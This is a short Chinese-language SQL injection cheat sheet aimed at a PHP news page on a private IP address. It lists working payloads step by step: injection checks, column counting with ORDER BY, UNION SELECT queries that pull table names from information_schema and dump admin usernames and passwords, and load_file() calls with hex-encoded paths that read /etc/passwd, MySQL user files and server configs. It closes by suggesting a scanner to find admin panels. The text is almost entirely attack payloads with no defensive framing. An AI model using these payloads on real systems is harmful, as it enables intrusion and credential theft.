SQL注入常用手法

1.首先确定是否存在注入点

http://192.168.16.128/news.php?id=1

http://192.168.16.128/news.php?id=1'     出错或显示不正常

http://192.168.16.128/news.php?id=1 and 1=1    正常

http://192.168.16.128/news.php?id=1 and 1=2    出错或显示不正常

如果有出错，说明存在注入点。

2.确定字段长度。

http://192.168.16.128/news.php?id=1 and 1=1 order by 8  正常

http://192.168.16.128/news.php?id=1 and 1=1 order by 10  出错

说明字段长度为9

3.猜字段

http://192.168.16.128/news.php?id=1 and 1=2 union select 1,2,3,4,5,6,7,8,9

发现页面文章处出现4,7,9，于是在4,7,9上填入SQL语句

http://192.168.16.128/news.php?id=1 and 1=2 union select 1,2,3,4,5,6,7,8,9 from admin

对于5.0以上的版本可以使用information_schema来爆数据库

http://192.168.16.128/news.php?id=1 and 1=2 union select 1,2,3,group_concat(table_name),5,6,7,8,9

from information_schema.tables where table_schema=database()

假如存在admin表

http://192.168.16.128/news.php?id=1 and 1=2 union select 1,2,3,group_concat(column_name),5,6,7,8,9

from information_schema.columns where table_name=0x61646D696E

http://192.168.16.128/news.php?id=1 and 1=2 union select 1,2,3,group_concat(username,0x40,password),5,6,7,8,9
from admin

4.进一步利用load_file()

http://192.168.16.128/news.php?id=1 and 1=2 union select 1,2,3,load_file(0x633A5C626F6F742E696E69),5,6,7,8,9

load_file(0x633A5C626F6F742E696E69)                   c:\boot.ini
load_file(0x633A5C77696E646F77735C6D792E696E69)       c:\windows\my.ini
load_file(0x633A5C77696E646F77735C7068702E696E69)     c:\windows\php.ini
load_file(0x6D7973716C2F757365722E4D5944)             mysql/user.MYD  跨表查询数据库密码

load_file(0x2F6574632F706173737764)                      /etc/passwd
0x2F6574632F68747470642F636F6E662F68747470642E636F6E66   /etc/httpd/conf/httpd.conf
load_file(0x2F6574632F7068702E696E69)                    /etc/php.ini
0x2F6574632F706870352F617061636865322F7068702E696E69     /etc/php5/apache2/php.ini
load_file(0x2F6574632F6D792E696E69)                      /etc/my.ini

5.使用wwwscan扫描网站后台

主要目标：找后台以及phpmyadmin等